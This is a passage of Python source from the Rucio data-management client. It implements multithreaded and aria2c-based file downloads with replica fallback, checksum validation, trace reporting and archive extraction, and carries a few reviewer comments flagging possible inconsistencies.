transfer_timeout - Optional: Timeout time for the download protocols. (Default: None)
:param num_threads: Suggestion of number of threads to use for the download. It will be lowered if it's too high.
:param trace_custom_fields: Custom key value pairs to send with the traces.
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
:raises InputValidationError: if one of the input items is in the wrong format
:raises NoFilesDownloaded: if no files could be downloaded
:raises NotAllFilesDownloaded: if not all files could be downloaded
:raises RucioException: if something unexpected went wrong during the download
"""
logger = self.logger
trace_custom_fields['uuid'] = generate_uuid()
logger.info('Processing %d item(s) for input' % len(items))
download_info = self._resolve_and_merge_input_items(copy.deepcopy(items))
did_to_options = download_info['did_to_options']
merged_items = download_info['merged_items']
self.logger.debug('num_unmerged_items=%d; num_dids=%d; num_merged_items=%d' % (len(items), len(did_to_options), len(merged_items)))
logger.info('Getting sources of DIDs')
# if one item wants to resolve archives we enable it for all items
resolve_archives = not all(item.get('no_resolve_archives') for item in merged_items)
merged_items_with_sources = self._get_sources(merged_items, resolve_archives=resolve_archives)
input_items = self._prepare_items_for_download(did_to_options, merged_items_with_sources, resolve_archives=resolve_archives)
num_files_in = len(input_items)
output_items = self._download_multithreaded(input_items, num_threads, trace_custom_fields)
num_files_out = len(output_items)
if num_files_in != num_files_out:
raise RucioException('%d items were in the input queue but only %d are in the output queue' % (num_files_in, num_files_out))
return self._check_output(output_items)
def download_from_metalink_file(self, item, metalink_file_path, num_threads=2, trace_custom_fields={}):
"""
Download items using a given metalink file.
:param item: dictionary describing an item to download. Keys:
base_dir - Optional: base directory where the downloaded files will be stored. (Default: '.')
no_subdir - Optional: If true, files are written directly into base_dir and existing files are overwritten. (Default: False)
ignore_checksum - Optional: If true, skips the checksum validation between the downloaded file and the rucio catalouge. (Default: False)
transfer_timeout - Optional: Timeout time for the download protocols. (Default: None)
:param num_threads: Suggestion of number of threads to use for the download. It will be lowered if it's too high.
:param trace_custom_fields: Custom key value pairs to send with the traces.
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
:raises InputValidationError: if one of the input items is in the wrong format
:raises NoFilesDownloaded: if no files could be downloaded
:raises NotAllFilesDownloaded: if not all files could be downloaded
:raises RucioException: if something unexpected went wrong during the download
"""
logger = self.logger
logger.info('Getting sources from metalink file')
metalinks = parse_replicas_from_file(metalink_file_path)
trace_custom_fields['uuid'] = generate_uuid()
did_to_options = {}
item.setdefault('destinations', set()).add((item['base_dir'], item['no_subdir']))
for metalink in metalinks:
did_to_options[metalink['did']] = item
metalinks = [metalinks]
input_items = self._prepare_items_for_download(did_to_options, metalinks)
num_files_in = len(input_items)
output_items = self._download_multithreaded(input_items, num_threads, trace_custom_fields)
num_files_out = len(output_items)
if num_files_in != num_files_out:
raise RucioException('%d items were in the input queue but only %d are in the output queue' % (num_files_in, num_files_out))
return self._check_output(output_items)
def _download_multithreaded(self, input_items, num_threads, trace_custom_fields={}):
"""
Starts an appropriate number of threads to download items from the input list.
(This function is meant to be used as class internal only)
:param input_items: list containing the input items to download
:param num_threads: suggestion of how many threads should be started
:param trace_custom_fields: Custom key value pairs to send with the traces
:returns: list with output items as dictionaries
"""
logger = self.logger
num_files = len(input_items)
nlimit = 5
num_threads = max(1, num_threads)
num_threads = min(num_files, num_threads, nlimit)
input_queue = Queue()
output_queue = Queue()
input_queue.queue = deque(input_items)
if num_threads < 2:
logger.info('Using main thread to download %d file(s)' % num_files)
self._download_worker(input_queue, output_queue, trace_custom_fields, '')
return list(output_queue.queue)
logger.info('Using %d threads to download %d files' % (num_threads, num_files))
threads = []
for thread_num in range(1, num_threads + 1):
log_prefix = 'Thread %s/%s: ' % (thread_num, num_threads)
kwargs = {'input_queue': input_queue,
'output_queue': output_queue,
'trace_custom_fields': trace_custom_fields,
'log_prefix': log_prefix}
try:
thread = Thread(target=self._download_worker, kwargs=kwargs)
thread.start()
threads.append(thread)
except Exception as error:
logger.warning('Failed to start thread %d' % thread_num)
logger.debug(error)
try:
logger.debug('Waiting for threads to finish')
for thread in threads:
thread.join()
except KeyboardInterrupt:
logger.warning('You pressed Ctrl+C! Exiting gracefully')
for thread in threads:
thread.kill_received = True
return list(output_queue.queue)
def _download_worker(self, input_queue, output_queue, trace_custom_fields, log_prefix):
"""
This function runs as long as there are items in the input queue,
downloads them and stores the output in the output queue.
(This function is meant to be used as class internal only)
:param input_queue: queue containing the input items to download
:param output_queue: queue where the output items will be stored
:param trace_custom_fields: Custom key value pairs to send with the traces
:param log_prefix: string that will be put at the beginning of every log message
"""
logger = self.logger
logger.debug('%sStart processing queued downloads' % log_prefix)
while True:
try:
item = input_queue.get_nowait()
except Empty:
break
try:
trace = copy.deepcopy(self.trace_tpl)
trace.update(trace_custom_fields)
download_result = self._download_item(item, trace, log_prefix)
output_queue.put(download_result)
except KeyboardInterrupt:
logger.warning('You pressed Ctrl+C! Exiting gracefully')
os.kill(os.getpgid(), signal.SIGINT)
break
except Exception as error:
logger.error('%sFailed to download item' % log_prefix)
logger.debug(error)
    def _download_item(self, item, trace, log_prefix=''):
        """
        Downloads the given item and sends traces for success/failure.
        (This function is meant to be used as class internal only)

        :param item: dictionary that describes the item to download
        :param trace: dictionary representing a pattern of trace that will be send
        :param log_prefix: string that will be put at the beginning of every log message

        :returns: dictionary with all attributes from the input item and a
                  clientState attribute (ALREADY_DONE, FILE_NOT_FOUND, FAILED or DONE)
        """
        logger = self.logger

        did_scope = item['scope']
        did_name = item['name']
        did_str = '%s:%s' % (did_scope, did_name)
        logger.info('%sPreparing download of %s' % (log_prefix, did_str))

        trace['scope'] = did_scope
        trace['filename'] = did_name
        # setdefault: keep dataset/filesize fields if the caller already filled them
        trace.setdefault('datasetScope', item.get('dataset_scope', ''))
        trace.setdefault('dataset', item.get('dataset_name', ''))
        trace.setdefault('filesize', item.get('bytes'))

        dest_file_paths = item['dest_file_paths']

        # if file already exists make sure it exists at all destination paths, set state, send trace, and return
        for dest_file_path in dest_file_paths:
            if os.path.isfile(dest_file_path):
                logger.info('%sFile exists already locally: %s' % (log_prefix, did_str))
                for missing_file_path in dest_file_paths:
                    if not os.path.isfile(missing_file_path):
                        logger.debug("copying '%s' to '%s'" % (dest_file_path, missing_file_path))
                        shutil.copy2(dest_file_path, missing_file_path)
                item['clientState'] = 'ALREADY_DONE'
                trace['transferStart'] = time.time()
                trace['transferEnd'] = time.time()
                trace['clientState'] = 'ALREADY_DONE'
                # NOTE(review): this path calls send_trace() directly while all other
                # paths go through self._send_trace() (which presumably honours
                # self.tracing) — confirm this bypass is intended
                send_trace(trace, self.client.host, self.client.user_agent)
                return item

        # check if file has replicas
        sources = item.get('sources')
        if not sources or not len(sources):
            logger.warning('%sNo available source found for file: %s' % (log_prefix, did_str))
            item['clientState'] = 'FILE_NOT_FOUND'
            trace['clientState'] = 'FILE_NOT_FOUND'
            self._send_trace(trace)
            return item

        # try different PFNs until one succeeded
        temp_file_path = item['temp_file_path']
        success = False
        i = 0
        while not success and i < len(sources):
            source = sources[i]
            i += 1
            pfn = source['pfn']
            rse_name = source['rse']
            # scheme is everything before the first ':' of the PFN (e.g. 'root', 'https')
            scheme = pfn.split(':')[0]

            try:
                rse = rsemgr.get_rse_info(rse_name)
            except RSENotFound:
                logger.warning('%sCould not get info of RSE %s' % (log_prefix, rse_name))
                continue

            trace['remoteSite'] = rse_name
            trace['clientState'] = 'DOWNLOAD_ATTEMPT'
            trace['protocol'] = scheme

            logger.info('%sTrying to download with %s from %s: %s ' % (log_prefix, scheme, rse_name, did_str))

            try:
                protocol = rsemgr.create_protocol(rse, operation='read', scheme=scheme)
                protocol.connect()
            except Exception as error:
                logger.warning('%sFailed to create protocol for PFN: %s' % (log_prefix, pfn))
                logger.debug('scheme: %s, exception: %s' % (scheme, error))
                continue

            attempt = 0
            retries = 2
            # do some retries with the same PFN if the download fails
            while not success and attempt < retries:
                attempt += 1
                item['attemptnr'] = attempt

                # a leftover .part file from a previous attempt must be removed first
                if os.path.isfile(temp_file_path):
                    logger.debug('%sDeleting existing temporary file: %s' % (log_prefix, temp_file_path))
                    os.unlink(temp_file_path)

                start_time = time.time()

                try:
                    protocol.get(pfn, temp_file_path, transfer_timeout=item.get('merged_options', {}).get('transfer_timeout'))
                    success = True
                except Exception as error:
                    logger.debug(error)
                    # record the exception class name as the trace client state
                    trace['clientState'] = str(type(error).__name__)

                end_time = time.time()

                # validate the download against the catalogue checksum unless disabled;
                # adler32 is preferred, md5 is the fallback
                if success and not item.get('merged_options', {}).get('ignore_checksum', False):
                    rucio_checksum = item.get('adler32')
                    local_checksum = None
                    if rucio_checksum is None:
                        rucio_checksum = item.get('md5')
                        if rucio_checksum is None:
                            logger.warning('%sNo remote checksum available. Skipping validation.' % log_prefix)
                        else:
                            local_checksum = md5(temp_file_path)
                    else:
                        local_checksum = adler32(temp_file_path)

                    # when no remote checksum exists both sides stay None and compare equal
                    if rucio_checksum != local_checksum:
                        success = False
                        os.unlink(temp_file_path)
                        logger.warning('%sChecksum validation failed for file: %s' % (log_prefix, did_str))
                        logger.debug('Local checksum: %s, Rucio checksum: %s' % (local_checksum, rucio_checksum))
                        trace['clientState'] = 'FAIL_VALIDATE'
                if not success:
                    logger.warning('%sDownload attempt failed. Try %s/%s' % (log_prefix, attempt, retries))
                    self._send_trace(trace)

            protocol.close()

        if not success:
            logger.error('%sFailed to download file %s' % (log_prefix, did_str))
            item['clientState'] = 'FAILED'
            return item

        # move the temp file to the first destination, then copy to all others
        # (start_time/end_time are guaranteed bound here: success implies the
        # retry loop above executed at least once)
        dest_file_path_iter = iter(dest_file_paths)
        first_dest_file_path = next(dest_file_path_iter)
        logger.debug("renaming '%s' to '%s'" % (temp_file_path, first_dest_file_path))
        os.rename(temp_file_path, first_dest_file_path)

        for cur_dest_file_path in dest_file_path_iter:
            logger.debug("copying '%s' to '%s'" % (first_dest_file_path, cur_dest_file_path))
            shutil.copy2(first_dest_file_path, cur_dest_file_path)

        trace['transferStart'] = start_time
        trace['transferEnd'] = end_time
        trace['clientState'] = 'DONE'
        item['clientState'] = 'DONE'
        self._send_trace(trace)

        duration = round(end_time - start_time, 2)
        size = item.get('bytes')
        size_str = sizefmt(size, self.is_human_readable)
        if size and duration:
            rate = round((size / duration) * 1e-6, 2)
            logger.info('%sFile %s successfully downloaded. %s in %s seconds = %s MBps' % (log_prefix, did_str, size_str, duration, rate))
        else:
            logger.info('%sFile %s successfully downloaded in %s seconds' % (log_prefix, did_str, duration))

        # if the downloaded file is an archive, extract the requested members
        file_items_in_archive = item.get('archive_items', [])
        if len(file_items_in_archive) > 0:
            logger.info('%sExtracting %d file(s) from %s' % (log_prefix, len(file_items_in_archive), did_name))

            archive_file_path = first_dest_file_path
            for file_item in file_items_in_archive:
                extraction_ok = False
                extract_file_name = file_item['name']
                dest_file_path_iter = iter(file_item['dest_file_paths'])
                first_dest_file_path = next(dest_file_path_iter)
                dest_dir = os.path.dirname(first_dest_file_path)
                logger.debug('%sExtracting %s to %s' % (log_prefix, extract_file_name, dest_dir))
                # try each configured tool (unzip, tar) until one succeeds
                for extraction_tool in self.extraction_tools:
                    if extraction_tool.try_extraction(archive_file_path, extract_file_name, dest_dir):
                        extraction_ok = True
                        break

                if not extraction_ok:
                    logger.error('Extraction of file %s from archive %s failed.' % (extract_file_name, did_name))
                    continue

                first_dest_file_path = os.path.join(dest_dir, extract_file_name)
                for cur_dest_file_path in dest_file_path_iter:
                    logger.debug("copying '%s' to '%s'" % (first_dest_file_path, cur_dest_file_path))
                    shutil.copy2(first_dest_file_path, cur_dest_file_path)

            if not item.get('shall_keep_archive'):
                logger.debug('%sDeleting archive %s' % (log_prefix, did_name))
                os.remove(archive_file_path)

        return item
def download_aria2c(self, items, trace_custom_fields={}, filters={}):
"""
Uses aria2c to download the items with given DIDs. This function can also download datasets and wildcarded DIDs.
It only can download files that are available via https/davs.
Aria2c needs to be installed and X509_USER_PROXY needs to be set!
:param items: List of dictionaries. Each dictionary describing an item to download. Keys:
did - DID string of this file (e.g. 'scope:file.name'). Wildcards are not allowed
rse - Optional: rse name (e.g. 'CERN-PROD_DATADISK') or rse expression from where to download
base_dir - Optional: base directory where the downloaded files will be stored. (Default: '.')
no_subdir - Optional: If true, files are written directly into base_dir and existing files are overwritten. (Default: False)
nrandom - Optional: if the DID addresses a dataset, nrandom files will be randomly choosen for download from the dataset
ignore_checksum - Optional: If true, skips the checksum validation between the downloaded file and the rucio catalouge. (Default: False)
:param trace_custom_fields: Custom key value pairs to send with the traces
:param filters: dictionary containing filter options
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
:raises InputValidationError: if one of the input items is in the wrong format
:raises NoFilesDownloaded: if no files could be downloaded
:raises NotAllFilesDownloaded: if not all files could be downloaded
:raises RucioException: if something went wrong during the download (e.g. aria2c could not be started)
"""
logger = self.logger
trace_custom_fields['uuid'] = generate_uuid()
rpc_secret = '%x' % (random.getrandbits(64))
rpc_auth = 'token:%s' % rpc_secret
rpcproc, aria_rpc = self._start_aria2c_rpc(rpc_secret)
for item in items:
item['force_scheme'] = ['https', 'davs']
logger.info('Processing %d item(s) for input' % len(items))
download_info = self._resolve_and_merge_input_items(copy.deepcopy(items))
did_to_options = download_info['did_to_options']
merged_items = download_info['merged_items']
self.logger.debug('num_unmerged_items=%d; num_dids=%d; num_merged_items=%d' % (len(items), len(did_to_options), len(merged_items)))
logger.info('Getting sources of DIDs')
merged_items_with_sources = self._get_sources(merged_items)
input_items = self._prepare_items_for_download(did_to_options, merged_items_with_sources, resolve_archives=False)
try:
output_items = self._download_items_aria2c(input_items, aria_rpc, rpc_auth, trace_custom_fields)
except Exception as error:
self.logger.error('Unknown exception during aria2c download')
self.logger.debug(error)
finally:
try:
aria_rpc.aria2.forceShutdown(rpc_auth)
finally:
rpcproc.terminate()
return self._check_output(output_items)
def _start_aria2c_rpc(self, rpc_secret):
"""
Starts aria2c in RPC mode as a subprocess. Also creates
the RPC proxy instance.
(This function is meant to be used as class internal only)
:param rpc_secret: the secret for the RPC proxy
:returns: a tupel with the process and the rpc proxy objects
:raises RucioException: if the process or the proxy could not be created
"""
logger = self.logger
try:
from xmlrpclib import ServerProxy as RPCServerProxy # py2
except ImportError:
from xmlrpc.client import ServerProxy as RPCServerProxy
cmd = 'aria2c '\
'--enable-rpc '\
'--certificate=$X509_USER_PROXY '\
'--private-key=$X509_USER_PROXY '\
'--ca-certificate=/etc/pki/tls/certs/CERN-bundle.pem '\
'--quiet=true '\
'--allow-overwrite=true '\
'--auto-file-renaming=false '\
'--stop-with-process=%d '\
'--rpc-secret=%s '\
'--rpc-listen-all=false '\
'--rpc-max-request-size=100M '\
'--connect-timeout=5 '\
'--rpc-listen-port=%d'
logger.info('Starting aria2c rpc server...')
# trying up to 3 random ports
for attempt in range(3):
port = random.randint(1024, 65534)
logger.debug('Trying to start rpc server on port: %d' % port)
try:
to_exec = cmd % (os.getpid(), rpc_secret, port)
logger.debug(to_exec)
rpcproc = execute(to_exec, False)
except Exception as error:
raise RucioException('Failed to execute aria2c!', error)
# if port is in use aria should fail to start so give it some time
time.sleep(2)
# did it fail?
if rpcproc.poll() is not None:
(out, err) = rpcproc.communicate()
logger.debug('Failed to start aria2c with port: %d' % port)
logger.debug('aria2c output: %s' % out)
else:
break
if rpcproc.poll() is not None:
raise RucioException('Failed to start aria2c rpc server!')
try:
aria_rpc = RPCServerProxy('http://localhost:%d/rpc' % port)
except Exception as error:
rpcproc.kill()
raise RucioException('Failed to initialise rpc proxy!', error)
return (rpcproc, aria_rpc)
    def _download_items_aria2c(self, items, aria_rpc, rpc_auth, trace_custom_fields={}):
        """
        Uses aria2c to download the given items. Aria2c needs to be started
        as RPC background process first and a RPC proxy is needed.
        (This function is meant to be used as class internal only)

        :param items: list of dictionaries containing one dict for each file to download
        :param aria_rcp: RPCProxy to the aria2c process
        :param rpc_auth: the rpc authentication token
        :param trace_custom_fields: Custom key value pairs to send with the traces

        :returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
        """
        logger = self.logger

        gid_to_item = {}  # maps an aria2c download id (gid) to the download item
        pfn_to_rse = {}   # maps each queued PFN back to its RSE name for the traces
        items_to_queue = [item for item in items]

        # items get removed from gid_to_item when they are complete or failed
        # NOTE(review): this loop polls the rpc server without sleeping between
        # iterations — confirm busy-polling is acceptable here
        while len(gid_to_item) or len(items_to_queue):
            num_queued = 0

            # queue up to 100 files and then check arias status
            while (num_queued < 100) and len(items_to_queue):
                item = items_to_queue.pop()

                file_scope = item['scope']
                file_name = item['name']
                file_did_str = '%s:%s' % (file_scope, file_name)
                trace = {'scope': file_scope,
                         'filename': file_name,
                         'datasetScope': item.get('dataset_scope', ''),
                         'dataset': item.get('dataset_name', ''),
                         'protocol': 'https',
                         'remoteSite': '',
                         'filesize': item.get('bytes', None),
                         'transferStart': time.time(),
                         'transferEnd': time.time()}
                trace.update(self.trace_tpl)
                trace.update(trace_custom_fields)

                # get pfns from all replicas; davs PFNs are rewritten to https
                pfns = []
                for src in item['sources']:
                    pfn = src['pfn']
                    if pfn[0:4].lower() == 'davs':
                        pfn = pfn.replace('davs', 'https', 1)
                    pfns.append(pfn)
                    pfn_to_rse[pfn] = src['rse']

                # does file exist and are sources available?
                # workaround: only consider first dest file path for aria2c download
                dest_file_path = next(iter(item['dest_file_paths']))
                if os.path.isfile(dest_file_path):
                    logger.info('File exists already locally: %s' % file_did_str)
                    item['clientState'] = 'ALREADY_DONE'
                    trace['clientState'] = 'ALREADY_DONE'
                    self._send_trace(trace)
                elif len(pfns) == 0:
                    logger.warning('No available source found for file: %s' % file_did_str)
                    item['clientState'] = 'FILE_NOT_FOUND'
                    trace['clientState'] = 'FILE_NOT_FOUND'
                    self._send_trace(trace)
                else:
                    # hand the download over to aria2c; the trace is attached to
                    # the item and finalised once aria2c reports the download stopped
                    item['trace'] = trace
                    options = {'dir': os.path.dirname(dest_file_path),
                               'out': os.path.basename(item['temp_file_path'])}
                    gid = aria_rpc.aria2.addUri(rpc_auth, pfns, options)
                    gid_to_item[gid] = item
                    num_queued += 1
                    logger.debug('Queued file: %s' % file_did_str)

            # get some statistics
            aria_stat = aria_rpc.aria2.getGlobalStat(rpc_auth)
            num_active = int(aria_stat['numActive'])
            num_waiting = int(aria_stat['numWaiting'])
            num_stopped = int(aria_stat['numStoppedTotal'])

            # save start time if one of the active downloads has started
            active = aria_rpc.aria2.tellActive(rpc_auth, ['gid', 'completedLength'])
            for dlinfo in active:
                gid = dlinfo['gid']
                if int(dlinfo['completedLength']) > 0:
                    gid_to_item[gid].setdefault('transferStart', time.time())

            stopped = aria_rpc.aria2.tellStopped(rpc_auth, -1, num_stopped, ['gid', 'status', 'files'])
            for dlinfo in stopped:
                gid = dlinfo['gid']
                item = gid_to_item[gid]

                file_scope = item['scope']
                file_name = item['name']
                file_did_str = '%s:%s' % (file_scope, file_name)
                temp_file_path = item['temp_file_path']
                # workaround: only consider first dest file path for aria2c download
                dest_file_path = next(iter(item['dest_file_paths']))

                # ensure we didnt miss the active state (e.g. a very fast download)
                start_time = item.setdefault('transferStart', time.time())
                end_time = item.setdefault('transferEnd', time.time())

                # get used pfn for traces
                trace = item['trace']
                for uri in dlinfo['files'][0]['uris']:
                    if uri['status'].lower() == 'used':
                        trace['remoteSite'] = pfn_to_rse.get(uri['uri'], '')

                trace['transferStart'] = start_time
                trace['transferEnd'] = end_time

                # ensure file exists
                status = dlinfo.get('status', '').lower()
                if status == 'complete' and os.path.isfile(temp_file_path):
                    # checksum check
                    # NOTE(review): reads item['ignore_checksum'] directly here while
                    # _download_item reads merged_options['ignore_checksum'] — confirm
                    # which location callers actually populate
                    skip_check = item.get('ignore_checksum', False)
                    rucio_checksum = 0 if skip_check else item.get('adler32')
                    local_checksum = 0 if skip_check else adler32(temp_file_path)
                    if rucio_checksum == local_checksum:
                        item['clientState'] = 'DONE'
                        trace['clientState'] = 'DONE'
                        # remove .part ending
                        os.rename(temp_file_path, dest_file_path)

                        # calculate duration
                        duration = round(end_time - start_time, 2)
                        duration = max(duration, 0.01)  # protect against 0 division
                        size = item.get('bytes', 0)
                        rate = round((size / duration) * 1e-6, 2)
                        size_str = sizefmt(size, self.is_human_readable)
                        logger.info('File %s successfully downloaded. %s in %s seconds = %s MBps' % (file_did_str,
                                                                                                    size_str,
                                                                                                    duration,
                                                                                                    rate))
                    else:
                        os.unlink(temp_file_path)
                        logger.warning('Checksum validation failed for file: %s' % file_did_str)
                        logger.debug('Local checksum: %s, Rucio checksum: %s' % (local_checksum, rucio_checksum))
                        item['clientState'] = 'FAIL_VALIDATE'
                        trace['clientState'] = 'FAIL_VALIDATE'
                else:
                    logger.error('Failed to download file: %s' % file_did_str)
                    logger.debug('Aria2c status: %s' % status)
                    item['clientState'] = 'FAILED'
                    trace['clientState'] = 'DOWNLOAD_ATTEMPT'

                self._send_trace(trace)
                del item['trace']

                aria_rpc.aria2.removeDownloadResult(rpc_auth, gid)
                del gid_to_item[gid]

            if len(stopped) > 0:
                logger.info('Active: %d, Waiting: %d, Stopped: %d' % (num_active, num_waiting, num_stopped))

        return items
def _resolve_and_merge_input_items(self, items):
    """
    This function takes the input items given to download_dids etc. and merges them
    respecting their individual options. This way functions can operate on these items
    in batch mode. E.g., list_replicas calls are reduced.

    :param items: List of dictionaries. Each dictionary describing an input item
    :returns: a dictionary with a dictionary that maps the input DIDs to options
              and a list with a dictionary for each merged download item
    :raises InputValidationError: if one of the input items is in the wrong format

    NOTE: this method consumes ``items`` (entries are popped off the list) and
    mutates the remaining item dictionaries in place.
    """
    logger = self.logger

    # check mandatory options before doing any server calls
    for item in items:
        if item.get('resolve_archives') is not None:
            logger.warning('resolve_archives option is deprecated and will be removed in a future release.')
            # translate the deprecated flag into its (inverted) replacement option
            item.setdefault('no_resolve_archives', not item.pop('resolve_archives'))

        did = item.get('did', [])
        if len(did) == 0:
            # an item without explicit DIDs must at least carry a scope filter
            # so that DIDs can be discovered server-side
            if not item.get('filters', {}).get('scope'):
                logger.debug(item)
                raise InputValidationError('Item without did and filter/scope')
            # [None] marks "resolve DIDs via filters" for the loop below
            item['did'] = [None]
        elif not isinstance(did, list):
            # normalise a single DID string into a list
            item['did'] = [did]

    # two items are merged only if they agree on all of these options
    distinct_keys = ['rse', 'force_scheme', 'nrandom']
    # DID strings whose options were already fixed by an earlier item
    all_resolved_did_strs = set()

    did_to_options = {}
    merged_items = []
    download_info = {'did_to_options': did_to_options,
                     'merged_items': merged_items}

    while len(items) > 0:
        item = items.pop()
        filters = item.get('filters', {})
        item_dids = item.pop('did')
        if item_dids[0] is None:
            # no explicit DIDs were given: discover them via the filters
            logger.debug('Resolving DIDs by using filter options')
            item_dids = []
            scope = filters.pop('scope')
            for did_name in self.client.list_dids(scope, filters=filters, type='all'):
                item_dids.append('%s:%s' % (scope, did_name))

        # per-item options that are folded into the per-DID options below
        base_dir = item.pop('base_dir', '.')
        no_subdir = item.pop('no_subdir', False)
        ignore_checksum = item.pop('ignore_checksum', False)
        new_transfer_timeout = item.pop('transfer_timeout', None)
        resolved_dids = item.setdefault('dids', [])
        for did_str in item_dids:
            did_scope, did_name = self._split_did_str(did_str)
            tmp_did_names = []
            if '*' in did_name:
                # wildcard in the name: expand it server-side
                filters['name'] = did_name
                tmp_did_names = list(self.client.list_dids(did_scope, filters=filters, type='all'))
            else:
                tmp_did_names = [did_name]

            for did_name in tmp_did_names:
                resolved_did_str = '%s:%s' % (did_scope, did_name)
                options = did_to_options.setdefault(resolved_did_str, {})
                # destinations accumulate across items (a DID may be wanted in several places)
                options.setdefault('destinations', set()).add((base_dir, no_subdir))

                if resolved_did_str in all_resolved_did_strs:
                    # in this case the DID was already given in another item
                    # the options of this DID will be ignored and the options of the first item that contained the DID will be used
                    # another approach would be to compare the options and apply the more relaxed options
                    logger.debug('Ignoring further options of DID: %s' % resolved_did_str)
                    continue

                options['ignore_checksum'] = (options.get('ignore_checksum') or ignore_checksum)

                # keep the larger of the two timeouts if both were given
                cur_transfer_timeout = options.setdefault('transfer_timeout', None)
                if cur_transfer_timeout is not None and new_transfer_timeout is not None:
                    options['transfer_timeout'] = max(int(cur_transfer_timeout), int(new_transfer_timeout))
                elif new_transfer_timeout is not None:
                    options['transfer_timeout'] = int(new_transfer_timeout)

                resolved_dids.append({'scope': did_scope, 'name': did_name})
                all_resolved_did_strs.add(resolved_did_str)

        if len(resolved_dids) == 0:
            logger.warning('An item didnt have any DIDs after resolving the input. Ignoring it.')
            logger.debug(item)
            continue

        # merge this item into an existing one when all distinct_keys match
        was_merged = False
        for merged_item in merged_items:
            if all(item.get(k) == merged_item.get(k) for k in distinct_keys):
                merged_item['dids'].extend(resolved_dids)
                was_merged = True
                break
        if not was_merged:
            item['dids'] = resolved_dids
            merged_items.append(item)
    return download_info
def _get_sources(self, merged_items, resolve_archives=True):
    """
    Resolve each merged download item into its replica sources (PFNs).

    :param merged_items: list of dictionaries; each dictionary describes a bunch of DIDs to download
    :param resolve_archives: whether archives containing the requested files may be offered as sources
    :returns: list of lists of dictionaries (one inner list per input item)
    """
    logger = self.logger
    items_with_sources = []
    for item in merged_items:
        # since we're using metalink we need to explicitly give all schemes
        schemes = item.get('force_scheme')
        if schemes:
            schemes = schemes if isinstance(schemes, list) else [schemes]
        logger.debug('schemes: %s' % schemes)

        # extend RSE expression to exclude tape RSEs for non-admin accounts
        rse_expression = item.get('rse')
        if self.is_tape_excluded:
            rse_expression = '*\istape=true' if not rse_expression else '(%s)\istape=true' % rse_expression
        logger.debug('rse_expression: %s' % rse_expression)

        # get PFNs of files and datasets
        logger.debug('num DIDs for list_replicas call: %d' % len(item['dids']))
        metalink_str = self.client.list_replicas(item['dids'],
                                                 schemes=schemes,
                                                 rse_expression=rse_expression,
                                                 client_location=self.client_location,
                                                 resolve_archives=resolve_archives,
                                                 resolve_parents=True,
                                                 metalink=True)
        file_items = parse_replicas_from_string(metalink_str)
        logger.debug('num resolved files: %s' % len(file_items))

        # optionally keep only a random subset of the resolved replicas
        nrandom = item.get('nrandom')
        if nrandom:
            logger.info('Selecting %d random replicas from DID(s): %s' % (nrandom, item['dids']))
            random.shuffle(file_items)
            file_items = file_items[0:nrandom]
        items_with_sources.append(file_items)
    return items_with_sources
def _prepare_items_for_download(self, did_to_options, merged_items_with_sources, resolve_archives=True):
    """
    Optimises the amount of files to download
    (This function is meant to be used as class internal only)

    :param did_to_options: dictionary that maps each input DID to some input options
    :param merged_items_with_sources: list of dictionaries. Each dictionary describes a bunch of DIDs to download
    :param resolve_archives: if True, sources marked client_extract may be grouped into archive download packs
    :returns: list of dictionaries. Each dictionary describes an element to download
    :raises InputValidationError: if the given input is not valid or incomplete
    """
    logger = self.logger

    if resolve_archives:
        # perhaps we'll need an extraction tool so check what is installed
        self.extraction_tools = [tool for tool in self.extraction_tools if tool.is_useable()]
        if len(self.extraction_tools) < 1:
            logger.warning('Archive resolution is enabled but no extraction tool is available. '
                           'Sources whose protocol doesnt support extraction wont be considered for download.')

    # maps file item IDs (fiid) to the file item object
    fiid_to_file_item = {}
    # list of all file item objects
    all_file_items = []

    # cea -> client_extract archives to avoid confusion with archives that dont need explicit extraction
    # this dict will contain all ids of cea's that definitely will be downloaded
    cea_id_pure_to_fiids = {}
    # this dict will contain ids of cea's that have higher prioritised non cea sources
    cea_id_mixed_to_fiids = {}

    all_input_dids = set(did_to_options.keys())
    # used to detect two different file items writing to the same path
    all_dest_file_paths = set()

    # get replicas for every file of the given dids
    logger.debug('num list_replicas calls: %d' % len(merged_items_with_sources))
    for file_items in merged_items_with_sources:
        all_file_items.extend(file_items)
        for file_item in file_items:
            # parent_dids contains all parents, so we take the intersection with the input dids
            dataset_did_strs = file_item.setdefault('parent_dids', set())
            dataset_did_strs.intersection_update(all_input_dids)

            file_did_str = file_item['did']
            file_did_scope, file_did_name = self._split_did_str(file_did_str)
            file_item['scope'] = file_did_scope
            file_item['name'] = file_did_name

            logger.debug('Queueing file: %s' % file_did_str)
            logger.debug('real parents: %s' % dataset_did_strs)
            logger.debug('options: %s' % did_to_options)

            # prepare destinations:
            # if datasets were given: prepare the destination paths for each dataset
            options = None
            dest_file_paths = file_item.get('dest_file_paths', set())
            for dataset_did_str in dataset_did_strs:
                options = did_to_options.get(dataset_did_str)
                if not options:
                    logger.error('No input options available for %s' % dataset_did_str)
                    continue

                destinations = options['destinations']
                dataset_scope, dataset_name = self._split_did_str(dataset_did_str)
                paths = [os.path.join(self._prepare_dest_dir(dest[0], dataset_name, file_did_name, dest[1]), file_did_name) for dest in destinations]
                if any(path in all_dest_file_paths for path in paths):
                    raise RucioException("Multiple file items with same destination file path")

                all_dest_file_paths.update(paths)
                dest_file_paths.update(paths)

                # workaround: just take any given dataset for the traces and the output
                file_item.setdefault('dataset_scope', dataset_scope)
                file_item.setdefault('dataset_name', dataset_name)

            # if no datasets were given only prepare the given destination paths
            if len(dataset_did_strs) == 0:
                options = did_to_options.get(file_did_str)
                if not options:
                    logger.error('No input options available for %s' % file_did_str)
                    continue

                destinations = options['destinations']
                paths = [os.path.join(self._prepare_dest_dir(dest[0], file_did_scope, file_did_name, dest[1]), file_did_name) for dest in destinations]
                if any(path in all_dest_file_paths for path in paths):
                    raise RucioException("Multiple file items with same destination file path")

                all_dest_file_paths.update(paths)
                dest_file_paths.update(paths)

            # options stays None when every lookup above failed; skip the file then
            if options is None:
                continue

            file_item['merged_options'] = options
            file_item['dest_file_paths'] = list(dest_file_paths)
            file_item['temp_file_path'] = '%s.part' % file_item['dest_file_paths'][0]

            # the file did str ist not an unique key for this dict because multiple calls of list_replicas
            # could result in the same DID multiple times. So we're using the id of the dictionary objects
            fiid = id(file_item)
            fiid_to_file_item[fiid] = file_item

            if resolve_archives:
                min_cea_priority = None
